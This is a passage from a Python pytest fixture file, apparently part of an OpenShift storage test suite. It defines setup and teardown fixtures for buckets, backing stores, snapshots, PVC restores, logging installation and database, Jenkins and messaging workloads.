*args,
**kwargs,
):
"""
Creates and deletes all buckets that were created as part of the test
Args:
amount (int): The amount of buckets to create
interface (str): The interface to use for creation of buckets.
S3 | OC | CLI | NAMESPACE
verify_Health (bool): Whether to verify the created bucket's health
post-creation
bucketclass (dict): A dictionary describing a new
bucketclass to be created.
When None, the default bucketclass is used.
Returns:
list: A list of s3.Bucket objects, containing all the created
buckets
"""
if bucketclass:
interface = bucketclass["interface"]
current_call_created_buckets = []
if interface.lower() not in BUCKET_MAP:
raise RuntimeError(
f"Invalid interface type received: {interface}. "
f'available types: {", ".join(BUCKET_MAP.keys())}'
)
bucketclass = (
bucketclass if bucketclass is None else bucket_class_factory(bucketclass)
)
for _ in range(amount):
bucket_name = helpers.create_unique_resource_name(
resource_description="bucket", resource_type=interface.lower()
)
created_bucket = BUCKET_MAP[interface.lower()](
bucket_name,
mcg=mcg_obj,
rgw=rgw_obj,
bucketclass=bucketclass,
replication_policy=replication_policy,
*args,
**kwargs,
)
current_call_created_buckets.append(created_bucket)
created_buckets.append(created_bucket)
if verify_health:
created_bucket.verify_health()
return current_call_created_buckets
def bucket_cleanup():
for bucket in created_buckets:
log.info(f"Cleaning up bucket {bucket.name}")
try:
bucket.delete()
except ClientError as e:
if e.response["Error"]["Code"] == "NoSuchBucket":
log.warning(f"{bucket.name} could not be found in cleanup")
else:
raise
request.addfinalizer(bucket_cleanup)
return _create_buckets
@pytest.fixture(scope="class")
def cloud_uls_factory(request, cld_mgr):
"""
Create an Underlying Storage factory.
Calling this fixture creates a new underlying storage(s).
Returns:
func: Factory method - each call to this function creates
an Underlying Storage factory
"""
return cloud_uls_factory_implementation(request, cld_mgr)
@pytest.fixture(scope="session")
def cloud_uls_factory_session(request, cld_mgr):
"""
Create an Underlying Storage factory.
Calling this fixture creates a new underlying storage(s).
Returns:
func: Factory method - each call to this function creates
an Underlying Storage factory
"""
return cloud_uls_factory_implementation(request, cld_mgr)
@pytest.fixture(scope="function")
def mcg_job_factory(request, bucket_factory, project_factory, mcg_obj, tmp_path):
"""
Create a Job factory.
Calling this fixture creates a new Job(s) that utilize MCG bucket.
Returns:
func: Factory method - each call to this function creates
a job
"""
return mcg_job_factory_implementation(
request, bucket_factory, project_factory, mcg_obj, tmp_path
)
@pytest.fixture(scope="session")
def mcg_job_factory_session(
request, bucket_factory_session, project_factory_session, mcg_obj_session, tmp_path
):
"""
Create a Job factory.
Calling this fixture creates a new Job(s) that utilize MCG bucket.
Returns:
func: Factory method - each call to this function creates
a job
"""
return mcg_job_factory_implementation(
request,
bucket_factory_session,
project_factory_session,
mcg_obj_session,
tmp_path,
)
@pytest.fixture()
def backingstore_factory(request, cld_mgr, mcg_obj, cloud_uls_factory):
"""
Create a Backing Store factory.
Calling this fixture creates a new Backing Store(s).
Returns:
func: Factory method - each call to this function creates
a backingstore
None: If MCG object not found
"""
if mcg_obj:
return backingstore_factory_implementation(
request, cld_mgr, mcg_obj, cloud_uls_factory
)
else:
return None
@pytest.fixture(scope="session")
def backingstore_factory_session(
request, cld_mgr, mcg_obj_session, cloud_uls_factory_session
):
"""
Create a Backing Store factory.
Calling this fixture creates a new Backing Store(s).
Returns:
func: Factory method - each call to this function creates
a backingstore
None: If session-scoped MCG object not found
"""
if mcg_obj_session:
return backingstore_factory_implementation(
request, cld_mgr, mcg_obj_session, cloud_uls_factory_session
)
else:
return None
@pytest.fixture()
def bucket_class_factory(
request, mcg_obj, backingstore_factory, namespace_store_factory
):
"""
Create a Bucket Class factory.
Calling this fixture creates a new Bucket Class.
Returns:
func: Factory method - each call to this function creates
a bucketclass
None: If MCG object not found
"""
if mcg_obj:
return bucketclass_factory_implementation(
request, mcg_obj, backingstore_factory, namespace_store_factory
)
else:
return None
@pytest.fixture(scope="session")
def bucket_class_factory_session(
request,
mcg_obj_session,
backingstore_factory_session,
namespace_store_factory_session,
):
"""
Create a Bucket Class factory.
Calling this fixture creates a new Bucket Class.
Returns:
func: Factory method - each call to this function creates
a bucketclass
None: If session-scoped MCG object not found
"""
if mcg_obj_session:
return bucketclass_factory_implementation(
request,
mcg_obj_session,
backingstore_factory_session,
namespace_store_factory_session,
)
else:
return None
@pytest.fixture()
def multiregion_mirror_setup(bucket_factory):
return multiregion_mirror_setup_fixture(bucket_factory)
@pytest.fixture(scope="session")
def multiregion_mirror_setup_session(bucket_factory_session):
return multiregion_mirror_setup_fixture(bucket_factory_session)
def multiregion_mirror_setup_fixture(bucket_factory):
# Setup
# Todo:
# add region and amount parametrization - note that `us-east-1`
# will cause an error as it is the default region. If usage of `us-east-1`
# needs to be tested, keep the 'region' field out.
bucketclass = {
"interface": "CLI",
"backingstore_dict": {"aws": [(1, "us-west-1"), (1, "us-east-2")]},
"placement_policy": "Mirror",
}
# Create a NooBucket that'll use the bucket class in order to test
# the mirroring policy
bucket = bucket_factory(1, "OC", bucketclass=bucketclass)[0]
return bucket, bucket.bucketclass.backingstores
@pytest.fixture(scope="session")
def default_storageclasses(request, teardown_factory_session):
"""
Returns dictionary with storageclasses. Keys represent reclaim policy of
storageclass. There are two storageclasses for each key. First is RBD based
and the second one is CephFS based. Storageclasses with Retain Reclaim
Policy are created from default storageclasses.
"""
scs = {constants.RECLAIM_POLICY_DELETE: [], constants.RECLAIM_POLICY_RETAIN: []}
# TODO(fbalak): Use proper constants after
# https://github.com/red-hat-storage/ocs-ci/issues/1056
# is resolved
for sc_name in ("ocs-storagecluster-ceph-rbd", "ocs-storagecluster-cephfs"):
sc = OCS(kind=constants.STORAGECLASS, metadata={"name": sc_name})
sc.reload()
scs[constants.RECLAIM_POLICY_DELETE].append(sc)
sc.data["reclaimPolicy"] = constants.RECLAIM_POLICY_RETAIN
sc.data["metadata"]["name"] += "-retain"
sc._name = sc.data["metadata"]["name"]
sc.create()
teardown_factory_session(sc)
scs[constants.RECLAIM_POLICY_RETAIN].append(sc)
return scs
@pytest.fixture(scope="class")
def install_logging(request):
"""
Setup and teardown
* The setup will deploy openshift-logging in the cluster
* The teardown will uninstall cluster-logging from the cluster
"""
def finalizer():
uninstall_cluster_logging()
request.addfinalizer(finalizer)
csv = ocp.OCP(
kind=constants.CLUSTER_SERVICE_VERSION,
namespace=constants.OPENSHIFT_LOGGING_NAMESPACE,
)
logging_csv = csv.get().get("items")
if logging_csv:
log.info("Logging is already configured, Skipping Installation")
return
log.info("Configuring Openshift-logging")
# Checks OCP version
ocp_version = get_running_ocp_version()
logging_channel = "stable" if ocp_version >= "4.7" else ocp_version
# Creates namespace openshift-operators-redhat
ocp_logging_obj.create_namespace(yaml_file=constants.EO_NAMESPACE_YAML)
# Creates an operator-group for elasticsearch
assert ocp_logging_obj.create_elasticsearch_operator_group(
yaml_file=constants.EO_OG_YAML, resource_name="openshift-operators-redhat"
)
# Set RBAC policy on the project
assert ocp_logging_obj.set_rbac(
yaml_file=constants.EO_RBAC_YAML, resource_name="prometheus-k8s"
)
# Creates subscription for elastic-search operator
subscription_yaml = templating.load_yaml(constants.EO_SUB_YAML)
subscription_yaml["spec"]["channel"] = logging_channel
helpers.create_resource(**subscription_yaml)
assert ocp_logging_obj.get_elasticsearch_subscription()
# Creates a namespace openshift-logging
ocp_logging_obj.create_namespace(yaml_file=constants.CL_NAMESPACE_YAML)
# Creates an operator-group for cluster-logging
assert ocp_logging_obj.create_clusterlogging_operator_group(
yaml_file=constants.CL_OG_YAML
)
# Creates subscription for cluster-logging
cl_subscription = templating.load_yaml(constants.CL_SUB_YAML)
cl_subscription["spec"]["channel"] = logging_channel
helpers.create_resource(**cl_subscription)
assert ocp_logging_obj.get_clusterlogging_subscription()
# Creates instance in namespace openshift-logging
cluster_logging_operator = OCP(
kind=constants.POD, namespace=constants.OPENSHIFT_LOGGING_NAMESPACE
)
log.info(f"The cluster-logging-operator {cluster_logging_operator.get()}")
ocp_logging_obj.create_instance()
@pytest.fixture
def fio_pvc_dict():
"""
PVC template for fio workloads.
Note that all 'None' values needs to be defined before usage.
"""
return fio_artefacts.get_pvc_dict()
@pytest.fixture(scope="session")
def fio_pvc_dict_session():
"""
PVC template for fio workloads.
Note that all 'None' values needs to be defined before usage.
"""
return fio_artefacts.get_pvc_dict()
@pytest.fixture
def fio_configmap_dict():
"""
ConfigMap template for fio workloads.
Note that you need to add actual configuration to workload.fio file.
"""
return fio_artefacts.get_configmap_dict()
@pytest.fixture(scope="session")
def fio_configmap_dict_session():
"""
ConfigMap template for fio workloads.
Note that you need to add actual configuration to workload.fio file.
"""
return fio_artefacts.get_configmap_dict()
@pytest.fixture
def fio_job_dict():
"""
Job template for fio workloads.
"""
return fio_artefacts.get_job_dict()
@pytest.fixture(scope="session")
def fio_job_dict_session():
"""
Job template for fio workloads.
"""
return fio_artefacts.get_job_dict()
@pytest.fixture(scope="function")
def pgsql_factory_fixture(request):
"""
Pgsql factory fixture
"""
pgsql = Postgresql()
def factory(
replicas,
clients=None,
threads=None,
transactions=None,
scaling_factor=None,
timeout=None,
sc_name=None,
):
"""
Factory to start pgsql workload
Args:
replicas (int): Number of pgbench pods to be deployed
clients (int): Number of clients
threads (int): Number of threads
transactions (int): Number of transactions
scaling_factor (int): scaling factor
timeout (int): Time in seconds to wait
"""
# Setup postgres
pgsql.setup_postgresql(replicas=replicas, sc_name=sc_name)
# Create pgbench benchmark
pgsql.create_pgbench_benchmark(
replicas=replicas,
clients=clients,
threads=threads,
transactions=transactions,
scaling_factor=scaling_factor,
timeout=timeout,
)
# Wait for pg_bench pod to initialized and complete
pgsql.wait_for_pgbench_status(status=constants.STATUS_COMPLETED)
# Get pgbench pods
pgbench_pods = pgsql.get_pgbench_pods()
# Validate pgbench run and parse logs
pgsql.validate_pgbench_run(pgbench_pods)
return pgsql
def finalizer():
"""
Clean up
"""
pgsql.cleanup()
request.addfinalizer(finalizer)
return factory
@pytest.fixture(scope="function")
def jenkins_factory_fixture(request):
"""
Jenkins factory fixture
"""
jenkins = Jenkins()
def factory(num_projects=1, num_of_builds=1):
"""
Factory to start jenkins workload
Args:
num_projects (int): Number of Jenkins projects
num_of_builds (int): Number of builds per project
"""
# Jenkins template
jenkins.create_ocs_jenkins_template()
# Init number of projects
jenkins.number_projects = num_projects
# Create app jenkins
jenkins.create_app_jenkins()
# Create jenkins pvc
jenkins.create_jenkins_pvc()
# Create jenkins build config
jenkins.create_jenkins_build_config()
# Wait jenkins deploy pod reach to completed state
jenkins.wait_for_jenkins_deploy_status(status=constants.STATUS_COMPLETED)
# Init number of builds per project
jenkins.number_builds_per_project = num_of_builds
# Start Builds
jenkins.start_build()
# Wait build reach 'Complete' state
jenkins.wait_for_build_to_complete()
# Print table of builds
jenkins.print_completed_builds_results()
return jenkins
def finalizer():
"""
Clean up
"""
jenkins.cleanup()
request.addfinalizer(finalizer)
return factory
@pytest.fixture(scope="function")
def couchbase_new_factory_fixture(request):
"""
Couchbase factory fixture using Couchbase operator
"""
couchbase = CouchBase()
def factory(
replicas=3,
run_in_bg=False,
skip_analyze=True,
sc_name=None,
num_items=None,
num_threads=None,
):
"""
Factory to start couchbase workload
Args:
replicas (int): Number of couchbase workers to be deployed
run_in_bg (bool): Run IOs in background as option
skip_analyze (bool): Skip logs analysis as option
"""
# Create Couchbase subscription
couchbase.couchbase_subscription()
# Create Couchbase worker secrets
couchbase.create_cb_secrets()
# Create couchbase workers
couchbase.create_cb_cluster(replicas=3, sc_name=sc_name)
couchbase.create_data_buckets()
# Run couchbase workload
couchbase.run_workload(
replicas=replicas,
run_in_bg=run_in_bg,
num_items=num_items,
num_threads=num_threads,
)
# Run sanity check on data logs
couchbase.analyze_run(skip_analyze=skip_analyze)
return couchbase
def finalizer():
"""
Clean up
"""
couchbase.teardown()
request.addfinalizer(finalizer)
return factory
@pytest.fixture(scope="function")
def amq_factory_fixture(request):
"""
AMQ factory fixture
"""
amq = AMQ()
def factory(
sc_name,
kafka_namespace=constants.AMQ_NAMESPACE,
size=100,
replicas=3,
topic_name="my-topic",
user_name="my-user",
partitions=1,
topic_replicas=1,
num_of_producer_pods=1,
num_of_consumer_pods=1,
value="10000",
since_time=1800,
):
"""
Factory to start amq workload
Args:
sc_name (str): Name of storage clase
kafka_namespace (str): Namespace where kafka cluster to be created
size (int): Size of the storage
replicas (int): Number of kafka and zookeeper pods to be created
topic_name (str): Name of the topic to be created
user_name (str): Name of the user to be created
partitions (int): Number of partitions of topic
topic_replicas (int): Number of replicas of topic
num_of_producer_pods (int): Number of producer pods to be created
num_of_consumer_pods (int): Number of consumer pods to be created
value (str): Number of messages to be sent and received
since_time (int): Number of seconds to required to sent the msg
"""
# Setup kafka cluster
amq.setup_amq_cluster(
sc_name=sc_name, namespace=kafka_namespace, size=size, replicas=replicas
)
# Run open messages
amq.create_messaging_on_amq(
topic_name=topic_name,
user_name=user_name,
partitions=partitions,
replicas=topic_replicas,
num_of_producer_pods=num_of_producer_pods,
num_of_consumer_pods=num_of_consumer_pods,
value=value,
)
# Wait for some time to generate msg
waiting_time = 60
log.info(f"Waiting for {waiting_time}sec to generate msg")
time.sleep(waiting_time)
# Check messages are sent and received
threads = amq.run_in_bg(
namespace=kafka_namespace, value=value, since_time=since_time
)
return amq, threads
def finalizer():
"""
Clean up
"""
# Clean up
amq.cleanup()
request.addfinalizer(finalizer)
return factory
@pytest.fixture
def measurement_dir(tmp_path):
"""
Returns directory path where should be stored all results related
to measurement. If 'measurement_dir' is provided by config then use it,
otherwise new directory is generated.
Returns:
str: Path to measurement directory
"""
if config.ENV_DATA.get("measurement_dir"):
measurement_dir = config.ENV_DATA.get("measurement_dir")
log.info(f"Using measurement dir from configuration: {measurement_dir}")
else:
measurement_dir = os.path.join(os.path.dirname(tmp_path), "measurement_results")
if not os.path.exists(measurement_dir):
log.info(f"Measurement dir {measurement_dir} doesn't exist. Creating it.")
os.mkdir(measurement_dir)
return measurement_dir
@pytest.fixture()
def multi_dc_pod(multi_pvc_factory, dc_pod_factory, service_account_factory):
"""
Prepare multiple dc pods for the test
Returns:
list: Pod instances
"""
def factory(
num_of_pvcs=1,
pvc_size=100,
project=None,
access_mode="RWO",
pool_type="rbd",
timeout=60,
):
dict_modes = {
"RWO": "ReadWriteOnce",
"RWX": "ReadWriteMany",
"RWX-BLK": "ReadWriteMany-Block",
}
dict_types = {"rbd": "CephBlockPool", "cephfs": "CephFileSystem"}
if access_mode in "RWX-BLK" and pool_type in "rbd":
modes = dict_modes["RWX-BLK"]
create_rbd_block_rwx_pod = True
else:
modes = dict_modes[access_mode]
create_rbd_block_rwx_pod = False
pvc_objs = multi_pvc_factory(
interface=dict_types[pool_type],
access_modes=[modes],
size=pvc_size,
num_of_pvc=num_of_pvcs,
project=project,
timeout=timeout,
)
dc_pods = []
dc_pods_res = []
sa_obj = service_account_factory(project=project)
with ThreadPoolExecutor() as p:
for pvc_obj in pvc_objs:
if create_rbd_block_rwx_pod:
dc_pods_res.append(
p.submit(
dc_pod_factory,
interface=constants.CEPHBLOCKPOOL,
pvc=pvc_obj,
raw_block_pv=True,
sa_obj=sa_obj,
)
)
else:
dc_pods_res.append(
p.submit(
dc_pod_factory,
interface=dict_types[pool_type],
pvc=pvc_obj,
sa_obj=sa_obj,
)
)
for dc in dc_pods_res:
pod_obj = dc.result()
if create_rbd_block_rwx_pod:
log.info(
"#### setting attribute pod_type since "
f"create_rbd_block_rwx_pod = {create_rbd_block_rwx_pod}"
)
setattr(pod_obj, "pod_type", "rbd_block_rwx")
else:
setattr(pod_obj, "pod_type", "")
dc_pods.append(pod_obj)
with ThreadPoolExecutor() as p:
for dc in dc_pods:
p.submit(
helpers.wait_for_resource_state,
resource=dc,
state=constants.STATUS_RUNNING,
timeout=120,
)
return dc_pods
return factory
@pytest.fixture(scope="session")
def htpasswd_path(tmpdir_factory):
"""
Returns:
string: Path to HTPasswd file with additional usernames
"""
return str(tmpdir_factory.mktemp("idp_data").join("users.htpasswd"))
@pytest.fixture(scope="session")
def htpasswd_identity_provider(request):
"""
Creates HTPasswd Identity provider.
Returns:
object: OCS object representing OCP OAuth object with HTPasswd IdP
"""
users.create_htpasswd_idp()
cluster = OCS(kind=constants.OAUTH, metadata={"name": "cluster"})
cluster.reload()
def finalizer():
"""
Remove HTPasswd IdP
"""
# TODO(fbalak): remove HTPasswd identityProvider
# cluster.ocp.patch(
# resource_name='cluster',
# params=f'[{ "op": "remove", "path": "/spec/identityProviders" }]'
# )
# users.delete_htpasswd_secret()
request.addfinalizer(finalizer)
return cluster
@pytest.fixture(scope="function")
def user_factory(request, htpasswd_identity_provider, htpasswd_path):
return users.user_factory(request, htpasswd_path)
@pytest.fixture(scope="session")
def user_factory_session(request, htpasswd_identity_provider, htpasswd_path):
return users.user_factory(request, htpasswd_path)
@pytest.fixture(autouse=True)
def log_alerts(request):
"""
Log alerts at the beginning and end of each test case. At the end of test
case print a difference: what new alerts are in place after the test is
complete.
"""
teardown = config.RUN["cli_params"].get("teardown")
dev_mode = config.RUN["cli_params"].get("dev_mode")
if teardown:
return
elif dev_mode:
log.info("Skipping alert check for development mode")
return
alerts_before = []
prometheus = None
try:
prometheus = PrometheusAPI()
except Exception:
log.exception("There was a problem with connecting to Prometheus")
def _collect_alerts():
try:
alerts_response = prometheus.get(
"alerts", payload={"silenced": False, "inhibited": False}
)
if alerts_response.ok:
alerts = alerts_response.json().get("data").get("alerts")
log.debug(f"Found alerts: {alerts}")
return alerts
else:
log.warning(
f"There was a problem with collecting alerts for analysis: {alerts_response.text}"
)
return False
except Exception:
log.exception("There was a problem with collecting alerts for analysis")
return False
def _print_diff():
if alerts_before:
alerts_after = _collect_alerts()
if alerts_after:
alerts_new = [
alert for alert in alerts_after if alert not in alerts_before
]
if alerts_new:
log.warning("During test were raised new alerts")
log.warning(alerts_new)
alerts_before = _collect_alerts()
request.addfinalizer(_print_diff)
@pytest.fixture(scope="session", autouse=True)
def ceph_toolbox(request):
"""
This fixture initiates ceph toolbox pod for manually created deployment
and if it does not already exist.
"""
deploy = config.RUN["cli_params"]["deploy"]
teardown = config.RUN["cli_params"].get("teardown")
skip_ocs = config.ENV_DATA["skip_ocs_deployment"]
deploy_teardown = deploy or teardown
managed_platform = (
config.ENV_DATA["platform"].lower() == constants.OPENSHIFT_DEDICATED_PLATFORM
or config.ENV_DATA["platform"].lower() == constants.ROSA_PLATFORM
)
if not (deploy_teardown or skip_ocs) or (managed_platform and not deploy_teardown):
try:
# Creating toolbox pod
setup_ceph_toolbox()
except CommandFailed:
log.info("Failed to create toolbox")
@pytest.fixture(scope="function")
def node_drain_teardown(request):
"""
Tear down function after Node drain
"""
def finalizer():
"""
Make sure that all cluster's nodes are in 'Ready' state and if not,
change them back to 'Ready' state by marking them as schedulable
"""
scheduling_disabled_nodes = [
n.name
for n in get_node_objs()
if n.ocp.get_resource_status(n.name)
== constants.NODE_READY_SCHEDULING_DISABLED
]
if scheduling_disabled_nodes:
schedule_nodes(scheduling_disabled_nodes)
ceph_health_check(tries=60)
request.addfinalizer(finalizer)
@pytest.fixture(scope="function")
def node_restart_teardown(request, nodes):
"""
Make sure all nodes are up and in 'Ready' state and if not,
try to make them 'Ready' by restarting the nodes.
"""
def finalizer():
# Start the powered off nodes
nodes.restart_nodes_by_stop_and_start_teardown()
try:
node.wait_for_nodes_status(status=constants.NODE_READY)
except ResourceWrongStatusException:
# Restart the nodes if in NotReady state
not_ready_nodes = [
n
for n in node.get_node_objs()
if n.ocp.get_resource_status(n.name) == constants.NODE_NOT_READY
]
if not_ready_nodes:
log.info(
f"Nodes in NotReady status found: {[n.name for n in not_ready_nodes]}"
)
nodes.restart_nodes_by_stop_and_start(not_ready_nodes)
node.wait_for_nodes_status(status=constants.NODE_READY)
request.addfinalizer(finalizer)
@pytest.fixture()
def mcg_connection_factory(request, mcg_obj, cld_mgr):
"""
Create a new MCG connection for given platform. If there already exists
a connection for the platform then return this previously created
connection.
"""
created_connections = {}
def _create_connection(platform=constants.AWS_PLATFORM, name=None):
"""
Args:
platform (str): Platform used for connection
name (str): New connection name. If not provided then new name will
be generated. New name will be used only if there is not
existing connection for given platform
Returns:
str: connection name
"""
if platform not in created_connections:
connection_name = name or create_unique_resource_name(
constants.MCG_CONNECTION, platform
)
mcg_obj.create_connection(cld_mgr, platform, connection_name)
created_connections[platform] = connection_name
return created_connections[platform]
def _connections_cleanup():
for platform in created_connections:
mcg_obj.delete_ns_connection(created_connections[platform])
request.addfinalizer(_connections_cleanup)
return _create_connection
@pytest.fixture()
def ns_resource_factory(
request, mcg_obj, cld_mgr, cloud_uls_factory, mcg_connection_factory
):
"""
Create a namespace resource factory. Calling this fixture creates a new namespace resource.
"""
created_ns_resources = []
def _create_ns_resources(platform=constants.AWS_PLATFORM):
# Create random connection_name
rand_connection = mcg_connection_factory(platform)
# Create the actual namespace resource
rand_ns_resource = create_unique_resource_name(
constants.MCG_NS_RESOURCE, platform
)
if platform == constants.RGW_PLATFORM:
region = None
else:
# TODO: fix this when https://github.com/red-hat-storage/ocs-ci/issues/3338
# is resolved
region = "us-east-2"
target_bucket_name = mcg_obj.create_namespace_resource(
rand_ns_resource,
rand_connection,
region,
cld_mgr,
cloud_uls_factory,
platform,
)
log.info(f"Check validity of NS resource {rand_ns_resource}")
if platform == constants.AWS_PLATFORM:
endpoint = constants.MCG_NS_AWS_ENDPOINT
elif platform == constants.AZURE_PLATFORM:
endpoint = constants.MCG_NS_AZURE_ENDPOINT
elif platform == constants.RGW_PLATFORM:
rgw_conn = RGW()
endpoint, _, _ = rgw_conn.get_credentials()
else:
raise UnsupportedPlatformError(f"Unsupported Platform: {platform}")
mcg_obj.check_ns_resource_validity(
rand_ns_resource, target_bucket_name, endpoint
)
created_ns_resources.append(rand_ns_resource)
return target_bucket_name, rand_ns_resource
def ns_resources_cleanup():
for ns_resource in created_ns_resources:
mcg_obj.delete_ns_resource(ns_resource)
request.addfinalizer(ns_resources_cleanup)
return _create_ns_resources
@pytest.fixture()
def namespace_store_factory(request, cld_mgr, mcg_obj, cloud_uls_factory):
"""
Create a Namespace Store factory.
Calling this fixture creates a new Namespace Store(s).
Returns:
func: Factory method - each call to this function creates
a namespacestore
"""
return namespacestore_factory_implementation(
request, cld_mgr, mcg_obj, cloud_uls_factory
)
@pytest.fixture(scope="session")
def namespace_store_factory_session(
request, cld_mgr, mcg_obj_session, cloud_uls_factory_session
):
"""
Create a Namespace Store factory.
Calling this fixture creates a new Namespace Store(s).
Returns:
func: Factory method - each call to this function creates
a namespacestore
"""
return namespacestore_factory_implementation(
request, cld_mgr, mcg_obj_session, cloud_uls_factory_session
)
@pytest.fixture()
def snapshot_factory(request):
"""
Snapshot factory. Calling this fixture creates a volume snapshot from the
specified PVC
"""
instances = []
def factory(pvc_obj, wait=True, snapshot_name=None):
"""
Args:
pvc_obj (PVC): PVC object from which snapshot has to be created
wait (bool): True to wait for snapshot to be ready, False otherwise
snapshot_name (str): Name to be provided for snapshot
Returns:
OCS: OCS instance of kind VolumeSnapshot
"""
snap_obj = pvc_obj.create_snapshot(snapshot_name=snapshot_name, wait=wait)
instances.append(snap_obj)
return snap_obj
def finalizer():
"""
Delete the snapshots
"""
snapcontent_objs = []
# Get VolumeSnapshotContent form VolumeSnapshots and delete
# VolumeSnapshots
for instance in instances:
if not instance.is_deleted:
snapcontent_objs.append(
helpers.get_snapshot_content_obj(snap_obj=instance)
)
instance.delete()
instance.ocp.wait_for_delete(instance.name)
# Wait for VolumeSnapshotContents to be deleted
for snapcontent_obj in snapcontent_objs:
snapcontent_obj.ocp.wait_for_delete(
resource_name=snapcontent_obj.name, timeout=240
)
request.addfinalizer(finalizer)
return factory
@pytest.fixture()
def multi_snapshot_factory(snapshot_factory):
"""
Snapshot factory. Calling this fixture creates volume snapshots of each
PVC in the provided list
"""
def factory(pvc_obj, wait=True, snapshot_name_suffix=None):
"""
Args:
pvc_obj (list): List PVC object from which snapshot has to be created
wait (bool): True to wait for snapshot to be ready, False otherwise
snapshot_name_suffix (str): Suffix to be added to snapshot
Returns:
OCS: List of OCS instances of kind VolumeSnapshot
"""
snapshot = []
for obj in pvc_obj:
log.info(f"Creating snapshot of PVC {obj.name}")
snapshot_name = (
f"{obj.name}-{snapshot_name_suffix}" if snapshot_name_suffix else None
)
snap_obj = snapshot_factory(
pvc_obj=obj, snapshot_name=snapshot_name, wait=wait
)
snapshot.append(snap_obj)
return snapshot
return factory
@pytest.fixture()
def snapshot_restore_factory(request):
"""
Snapshot restore factory. Calling this fixture creates new PVC out of the
specified VolumeSnapshot.
"""
instances = []
def factory(
snapshot_obj,
restore_pvc_name=None,
storageclass=None,
size=None,
volume_mode=None,
restore_pvc_yaml=None,
access_mode=constants.ACCESS_MODE_RWO,
status=constants.STATUS_BOUND,
):
"""
Args:
snapshot_obj (OCS): OCS instance of kind VolumeSnapshot which has
to be restored to new PVC
restore_pvc_name (str): Name to be provided for restored pvc
storageclass (str): Name of storageclass
size (str): Size of PVC being created. eg: 5Gi. Ideally, this
should be same as the restore size of snapshot. Adding this
parameter to consider negative test scenarios.
volume_mode (str): Volume mode for PVC. This should match the
volume mode of parent PVC.
restore_pvc_yaml (str): The location of pvc-restore.yaml
access_mode (str): This decides the access mode to be used for the
PVC. ReadWriteOnce is default.
status (str): If provided then factory waits for the PVC to reach
desired state.
Returns:
PVC: Restored PVC object
"""
snapshot_info = snapshot_obj.get()
size = size or snapshot_info["status"]["restoreSize"]
restore_pvc_name = restore_pvc_name or (
helpers.create_unique_resource_name(snapshot_obj.name, "restore")
)
if snapshot_info["spec"]["volumeSnapshotClassName"] == (
helpers.default_volumesnapshotclass(constants.CEPHBLOCKPOOL).name
):
storageclass = (
storageclass
or helpers.default_storage_class(constants.CEPHBLOCKPOOL).name
)
restore_pvc_yaml = restore_pvc_yaml or constants.CSI_RBD_PVC_RESTORE_YAML
interface = constants.CEPHBLOCKPOOL
elif snapshot_info["spec"]["volumeSnapshotClassName"] == (
helpers.default_volumesnapshotclass(constants.CEPHFILESYSTEM).name
):
storageclass = (
storageclass
or helpers.default_storage_class(constants.CEPHFILESYSTEM).name
)
restore_pvc_yaml = restore_pvc_yaml or constants.CSI_CEPHFS_PVC_RESTORE_YAML
interface = constants.CEPHFILESYSTEM
restored_pvc = create_restore_pvc(
sc_name=storageclass,
snap_name=snapshot_obj.name,
namespace=snapshot_obj.namespace,
size=size,
pvc_name=restore_pvc_name,
volume_mode=volume_mode,
restore_pvc_yaml=restore_pvc_yaml,
access_mode=access_mode,
)
instances.append(restored_pvc)
restored_pvc.snapshot = snapshot_obj
restored_pvc.interface = interface
if status:
helpers.wait_for_resource_state(restored_pvc, status)
return restored_pvc
def finalizer():
"""
Delete the PVCs
"""
pv_objs = []
# Get PV form PVC instances and delete PVCs
for instance in instances:
if not instance.is_deleted:
pv_objs.append(instance.backed_pv_obj)
instance.delete()
instance.ocp.wait_for_delete(instance.name)
# Wait for PVs to delete
helpers.wait_for_pv_delete(pv_objs)
request.addfinalizer(finalizer)
return factory
@pytest.fixture()
def multi_snapshot_restore_factory(snapshot_restore_factory):
"""
Snapshot restore factory. Calling this fixture creates set of new PVC out of the
each VolumeSnapshot provided in the list.
"""
def factory(
snapshot_obj,
restore_pvc_suffix=None,
storageclass=None,
size=None,
volume_mode=None,
restore_pvc_yaml=None,
access_mode=constants.ACCESS_MODE_RWO,
status=constants.STATUS_BOUND,
wait_each=False,
):
"""
Args:
snapshot_obj (list): List OCS instance of kind VolumeSnapshot which has
to be restored to new PVC
restore_pvc_suffix (str): Suffix to be added to pvc name
storageclass (str): Name of storageclass
size (str): Size of PVC being created. eg: 5Gi. Ideally, this
should be same as the restore size of snapshot. Adding this
parameter to consider negative test scenarios.
volume_mode (str): Volume mode for PVC. This should match the
volume mode of parent PVC.
restore_pvc_yaml (str): The location of pvc-restore.yaml
access_mode (str): This decides the access mode to be used for the
PVC. ReadWriteOnce is default.
status (str): If provided then factory waits for the PVC to reach
desired state.
wait_each(bool): True to wait for each PVC to be in status 'status'
before creating next PVC, False otherwise
Returns:
PVC: List of restored PVC object
"""
new_pvcs = []
status_tmp = status if wait_each else ""
for snap_obj in snapshot_obj:
log.info(f"Creating a PVC from snapshot {snap_obj.name}")
restore_pvc_name = (
f"{snap_obj.name}-{restore_pvc_suffix}" if restore_pvc_suffix else None
)
restored_pvc = snapshot_restore_factory(
snapshot_obj=snap_obj,
restore_pvc_name=restore_pvc_name,
storageclass=storageclass,
size=size,
volume_mode=volume_mode,
restore_pvc_yaml=restore_pvc_yaml,
access_mode=access_mode,
status=status_tmp,
)
restored_pvc.snapshot = snapshot_obj
new_pvcs.append(restored_pvc)
if status and not wait_each:
for restored_pvc in new_pvcs:
helpers.wait_for_resource_state(restored_pvc, status)
return new_pvcs
return factory
@pytest.fixture(scope="session", autouse=True)
def collect_logs_fixture(request):
"""
This fixture collects ocs logs after tier execution and this will allow
to see the cluster's status after the execution on all execution status options.
"""
def finalizer():
"""
Tracking both logs separately reduce changes of collision
"""
if not config.RUN["cli_params"].get("deploy") and not config.RUN[
"cli_params"
].get("teardown"):
if config.REPORTING["collect_logs_on_success_run"]:
collect_ocs_logs("testcases", ocs=False, status_failure=False)
collect_ocs_logs("testcases", ocp=False, status_failure=False)
request.addfinalizer(finalizer)
def get_ready_noobaa_endpoint_count(namespace):
"""
Get the number of ready nooobaa endpoints
"""
pods_info = get_pods_having_label(
label=constants.NOOBAA_ENDPOINT_POD_LABEL, namespace=namespace
)
ready_count = 0
for ep_info in pods_info:
container_statuses = ep_info.get("status", {}).get("containerStatuses")
if container_statuses is not None and len(container_statuses) > 0:
if container_statuses[0].get("ready"):
ready_count += 1
return ready_count
@pytest.fixture(scope="function")
def nb_ensure_endpoint_count(request):
"""
Validate and ensure the number of running noobaa endpoints
"""
cls = request.cls
